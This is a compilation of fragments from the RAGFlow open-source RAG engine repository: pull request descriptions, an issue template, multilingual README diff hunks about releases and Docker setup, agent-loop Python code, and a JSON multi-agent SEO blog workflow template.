the schema and api/method between ES and Opensearch differs in many
ways(especially the knn_search has a significant gap) :
rag/utils/opensearch_coon.py
- Support static config adaptions by changing:
conf/service_conf.yaml、api/settings.py、rag/settings.py
- Supprt some store&search schema changes between OpenSearch and ES:
conf/os_mapping.json
- Support OpenSearch python sdk : pyproject.toml
- Support docker config for OpenSearch2.19.1 :
docker/.env、docker/docker-compose-base.yml、docker/service_conf.yaml.template
### How to use
- I didn't change the priority that ES as the default doc/search engine.
Only if in docker/.env , we set DOC_ENGINE=${DOC_ENGINE:-opensearch}, it
will work.
### Others
Our team tested a lot of docs in our environment by using OpenSearch as
the vector database ,it works very well.
All the conifg for OpenSearch is necessary.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Feat: Delete and rename files in the knowledge base #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display document parsing status #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The lock is not released correctly when task_exectuor is abnormal
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Some models force thinking, resulting in the absence of the think tag in
the returned content
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Sometimes after we commit the code and open the PR the CI pipeline fails
in Ruff checks. Including a pre-commit we can identify this problem
early and avoid time loss.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [X] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix the entrypoint file from the docker container to solve #7249
Here is the important part from the logs:
```
docker logs -f ragflow-server
...
usage: server.py [-h] [--base_url BASE_URL] [--host HOST] [--port PORT]
[--mode MODE] [--api_key API_KEY]
server.py: error: unrecognized arguments:
...
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR fixes an issue with the MCP server configuration in RAGFlow's
Docker deployment where:
1. Incorrect parameter naming (`--mcp--host-api-key` with double
hyphens) caused server startup failures
2. Port binding conflicts occurred due to unexposed MCP ports in Docker
3. Inconsistent host addressing between `0.0.0.0` and `127.0.0.1` led to
connectivity issues
The changes ensure proper MCP server initialization and reliable
inter-service communication.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Key Changes
1. **Parameter Correction**:
- Fixed `--mcp--host-api-key` → `--mcp-host-api-key`
### What problem does this PR solve?
Feat: Deleting files in batches. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
description:Propose a agent scenario request for RAGFlow.
title:"[Agent Scenario Request]: "
labels:["❤️🔥ᴬᴳᴱᴺᵀ agent scenario"]
body:
- type:checkboxes
attributes:
label:Self Checks
description:"Please check the following in order to be responded in time :)"
options:
- label:I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
required:true
- label:I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
required:true
- label:"Please do not modify this template :) and fill in all the required fields."
required:true
- type:textarea
attributes:
label:Is your feature request related to a scenario?
description:|
A clear and concise description of what the scenario is. Ex. I'm always frustrated when [...]
render:Markdown
validations:
required:false
- type:textarea
attributes:
label:Describe the feature you'd like
description:A clear and concise description of what you want to happen.
validations:
required:true
- type:textarea
attributes:
label:Documentation, adoption, use case
description:If you can, explain some scenarios how users might use this, situations it would be helpful in. Any API designs, mockups, or diagrams are also helpful.
render:Markdown
validations:
required:false
- type:textarea
attributes:
label:Additional information
description:|
Add any other context or screenshots about the feature request here.
- 2025-08-08 Supports OpenAI's latest GPT-5 series models.
- 2025-08-04 Supports new models, including Kimi K2 and Grok 4.
- 2025-08-01 Supports agentic workflow and MCP.
- 2025-05-23 Adds a Python/JavaScript code executor component to Agent.
- 2025-05-05 Supports cross-language query.
- 2025-03-19 Supports using a multi-modal model to make sense of images within PDF or DOCX files.
- 2025-02-28 Combined with Internet search (Tavily), supports reasoning like Deep Research for any LLMs.
- 2025-01-26 Optimizes knowledge graph extraction and application, offering various configuration options.
- 2024-12-18 Upgrades Document Layout Analysis model in DeepDoc.
- 2024-11-01 Adds keyword extraction and related question generation to the parsed chunks to improve the accuracy of retrieval.
- 2024-08-22 Support text to SQL statements through RAG.
## 🎉 Stay Tuned
@ -137,8 +149,10 @@ releases! 🌟
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
> If you have not installed Docker on your local machine (Windows, Mac, or Linux),
> see [Install Docker Engine](https://docs.docker.com/engine/install/).
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.
> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Start up the server
@ -176,7 +190,7 @@ releases! 🌟
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, follow [this guide](https://ragflow.io/docs/dev/build_docker_image) to build a Docker image compatible with your system.
> The command below downloads the `v0.18.0-slim` edition of the RAGFlow Docker image. See the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.18.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.18.0` for the full edition `v0.18.0`.
> The command below downloads the `v0.20.2-slim` edition of the RAGFlow Docker image. See the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.20.2-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.2` for the full edition `v0.20.2`.
```bash
$ cd ragflow/docker
@ -189,8 +203,8 @@ releases! 🌟
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
- 2025-08-08 Mendukung model seri GPT-5 terbaru dari OpenAI.
- 2025-08-04 Mendukung model baru, termasuk Kimi K2 dan Grok 4.
- 2025-08-01 Mendukung alur kerja agen dan MCP.
- 2025-05-23 Menambahkan komponen pelaksana kode Python/JS ke Agen.
- 2025-05-05 Mendukung kueri lintas bahasa.
- 2025-03-19 Mendukung penggunaan model multi-modal untuk memahami gambar di dalam file PDF atau DOCX.
- 2025-02-28 dikombinasikan dengan pencarian Internet (TAVILY), mendukung penelitian mendalam untuk LLM apa pun.
- 2025-01-26 Optimalkan ekstraksi dan penerapan grafik pengetahuan dan sediakan berbagai opsi konfigurasi.
- 2024-12-18 Meningkatkan model Analisis Tata Letak Dokumen di DeepDoc.
- 2024-11-01 Penambahan ekstraksi kata kunci dan pembuatan pertanyaan terkait untuk meningkatkan akurasi pengambilan.
- 2024-08-22 Dukungan untuk teks ke pernyataan SQL melalui RAG.
## 🎉 Tetap Terkini
@ -132,6 +140,10 @@ Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Hanya diperlukan jika Anda ingin menggunakan fitur eksekutor kode (sandbox) dari RAGFlow.
> [!TIP]
> Jika Anda belum menginstal Docker di komputer lokal Anda (Windows, Mac, atau Linux), lihat [Install Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Menjalankan Server
@ -169,7 +181,7 @@ Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
> Semua gambar Docker dibangun untuk platform x86. Saat ini, kami tidak menawarkan gambar Docker untuk ARM64.
> Jika Anda menggunakan platform ARM64, [silakan gunakan panduan ini untuk membangun gambar Docker yang kompatibel dengan sistem Anda](https://ragflow.io/docs/dev/build_docker_image).
> Perintah di bawah ini mengunduh edisi v0.18.0-slim dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.18.0-slim, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server. Misalnya, atur RAGFLOW_IMAGE=infiniflow/ragflow:v0.18.0 untuk edisi lengkap v0.18.0.
> Perintah di bawah ini mengunduh edisi v0.20.2-slim dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.20.2-slim, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server. Misalnya, atur RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.2 untuk edisi lengkap v0.20.2.
[RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
- 2025-05-23 Agent에 Python/JS 코드 실행기 구성 요소를 추가합니다.
- 2025-05-05 언어 간 쿼리를 지원합니다.
- 2025-03-19 PDF 또는 DOCX 파일 내의 이미지를 이해하기 위해 다중 모드 모델을 사용하는 것을 지원합니다.
- 2025-02-28 인터넷 검색(TAVILY)과 결합되어 모든 LLM에 대한 심층 연구를 지원합니다.
- 2025-01-26 지식 그래프 추출 및 적용을 최적화하고 다양한 구성 옵션을 제공합니다.
- 2024-12-18 DeepDoc의 문서 레이아웃 분석 모델 업그레이드.
- 2024-11-01 파싱된 청크에 키워드 추출 및 관련 질문 생성을 추가하여 재현율을 향상시킵니다.
- 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
## 🎉 계속 지켜봐 주세요
@ -112,6 +120,9 @@
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): RAGFlow의 코드 실행기(샌드박스) 기능을 사용하려는 경우에만 필요합니다.
> [!TIP]
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](<(https://docs.docker.com/engine/install/)>)를 참조하세요.
### 🚀 서버 시작하기
@ -149,7 +160,7 @@
> 모든 Docker 이미지는 x86 플랫폼을 위해 빌드되었습니다. 우리는 현재 ARM64 플랫폼을 위한 Docker 이미지를 제공하지 않습니다.
> ARM64 플랫폼을 사용 중이라면, [시스템과 호환되는 Docker 이미지를 빌드하려면 이 가이드를 사용해 주세요](https://ragflow.io/docs/dev/build_docker_image).
> 아래 명령어는 RAGFlow Docker 이미지의 v0.18.0-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.18.0-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.18.0을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.18.0로 설정합니다.
> 아래 명령어는 RAGFlow Docker 이미지의 v0.20.2-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.20.2-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.20.2을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.2로 설정합니다.
```bash
$ cd ragflow/docker
@ -162,8 +173,8 @@
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
- 08-08-2025 Suporta a mais recente série GPT-5 da OpenAI.
- 04-08-2025 Suporta novos modelos, incluindo Kimi K2 e Grok 4.
- 01-08-2025 Suporta fluxo de trabalho agente e MCP.
- 23-05-2025 Adicione o componente executor de código Python/JS ao Agente.
- 05-05-2025 Suporte a consultas entre idiomas.
- 19-03-2025 Suporta o uso de um modelo multi-modal para entender imagens dentro de arquivos PDF ou DOCX.
- 28-02-2025 combinado com a pesquisa na Internet (T AVI LY), suporta pesquisas profundas para qualquer LLM.
- 26-01-2025 Otimize a extração e aplicação de gráficos de conhecimento e forneça uma variedade de opções de configuração.
- 18-12-2024 Atualiza o modelo de Análise de Layout de Documentos no DeepDoc.
- 01-11-2024 Adiciona extração de palavras-chave e geração de perguntas relacionadas aos blocos analisados para melhorar a precisão da recuperação.
- 22-08-2024 Suporta conversão de texto para comandos SQL via RAG.
## 🎉 Fique Ligado
@ -132,6 +140,9 @@ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
- RAM >= 16 GB
- Disco >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Necessário apenas se você pretende usar o recurso de executor de código (sandbox) do RAGFlow.
> [!TIP]
> Se você não instalou o Docker na sua máquina local (Windows, Mac ou Linux), veja [Instalar Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Iniciar o servidor
@ -169,7 +180,7 @@ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
> Todas as imagens Docker são construídas para plataformas x86. Atualmente, não oferecemos imagens Docker para ARM64.
> Se você estiver usando uma plataforma ARM64, por favor, utilize [este guia](https://ragflow.io/docs/dev/build_docker_image) para construir uma imagem Docker compatível com o seu sistema.
> O comando abaixo baixa a edição `v0.18.0-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.18.0-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.18.0` para a edição completa `v0.18.0`.
> O comando abaixo baixa a edição `v0.20.2-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.20.2-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.2` para a edição completa `v0.20.2`.
```bash
$ cd ragflow/docker
@ -182,8 +193,8 @@ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
| Tag da imagem RAGFlow | Tamanho da imagem (GB) | Possui modelos de incorporação? | Estável? |
# self.toolcall_session.get_tool_obj(name).add2system_prompt(f"The chat history with other agents are as following: \n" + self.get_useful_memory(user_request, str(args["user_prompt"])))
raiseTypeError(f"List should be returned, but `{functions}`")
forfinfunctions:
ifnotisinstance(f,dict):
raiseTypeError(f"An object type should be returned, but `{f}`")
withThreadPoolExecutor(max_workers=5)asexecutor:
thr=[]
forfuncinfunctions:
name=func["name"]
args=func["arguments"]
ifname==COMPLETE_TASK:
append_user_content(hist,f"Respond with a formal answer. FORGET(DO NOT mention) about `{COMPLETE_TASK}`. The language for the response MUST be as the same as the first user request.\n")
logging.exception(msg=f"Wrong JSON argument format in LLM ReAct response: {e}")
e=f"\nTool call error, please correct the input parameter of response format and call it again.\n *** Exception ***\n{e}"
append_user_content(hist,str(e))
logging.warning(f"Exceed max rounds: {self._param.max_rounds}")
final_instruction=f"""
{user_request}
IMPORTANT: You have reached the conversation limit. Based on ALL the information and research you have gathered so far, please provide a DIRECT and COMPREHENSIVE final answer to the original request.
Instructions:
1. SYNTHESIZE all information collected during this conversation
2. Provide a COMPLETE response using existing data - do not suggest additional research
3. Structure your response as a FINAL DELIVERABLE, not a plan
4. If information is incomplete, state what you found and provide the best analysis possible with available data
5. DO NOT mention conversation limits or suggest further steps
6. Focus on delivering VALUE with the information already gathered
Respond immediately with your final comprehensive answer.
Task: You need to categorize the user’s questions into {} categories, namely: {}
self.sys_prompt="""
You are an advanced classification system that categorizes user questions into specific types. Analyze the input question and classify it into ONE of the following categories:
{}
Here's description of each category:
{}
- {}
You could learn from the following examples:
{}
You could learn from the above examples.
---- Instructions ----
- Consider both explicit mentions and implied context
- Prioritize the most specific applicable category
- Return only the category name without explanations
- Use "Other" only when no other category fits
Requirements:
- Just mention the category names, no need for any additional words.
return"⌛Give me a moment—starting from: \n\n"+re.sub(r"(User's query:|[\\]+)",'',msg[-1]['content'],flags=re.DOTALL)+"\n\nI’ll figure out our best next move."
"description":"This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI “writers”, where each agent plays a specialized role — just like a real editorial team.",
"canvas_type":"Agent",
"dsl":{
"components":{
"Agent:LuckyApplesGrab":{
"downstream":[
"Message:ModernSwansThrow"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Agent",
"id":"Agent:SlickSpidersTurn",
"name":"Outline Agent",
"params":{
"delay_after_error":1,
"description":"Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
},
{
"component_name":"Agent",
"id":"Agent:IcyPawsRescue",
"name":"Body Agent",
"params":{
"delay_after_error":1,
"description":"Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
},
{
"component_name":"Agent",
"id":"Agent:TenderAdsAllow",
"name":"Editor Agent",
"params":{
"delay_after_error":1,
"description":"Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"begin"
]
},
"Message:ModernSwansThrow":{
"downstream":[],
"obj":{
"component_name":"Message",
"params":{
"content":[
"{Agent:LuckyApplesGrab@content}"
]
}
},
"upstream":[
"Agent:LuckyApplesGrab"
]
},
"begin":{
"downstream":[
"Agent:LuckyApplesGrab"
],
"obj":{
"component_name":"Begin",
"params":{
"enablePrologue":true,
"inputs":{},
"mode":"conversational",
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
},
"label":"Begin",
"name":"begin"
},
"dragging":false,
"id":"begin",
"measured":{
"height":48,
"width":200
},
"position":{
"x":38.19445084117184,
"y":183.9781832844475
},
"selected":false,
"sourcePosition":"left",
"targetPosition":"right",
"type":"beginNode"
},
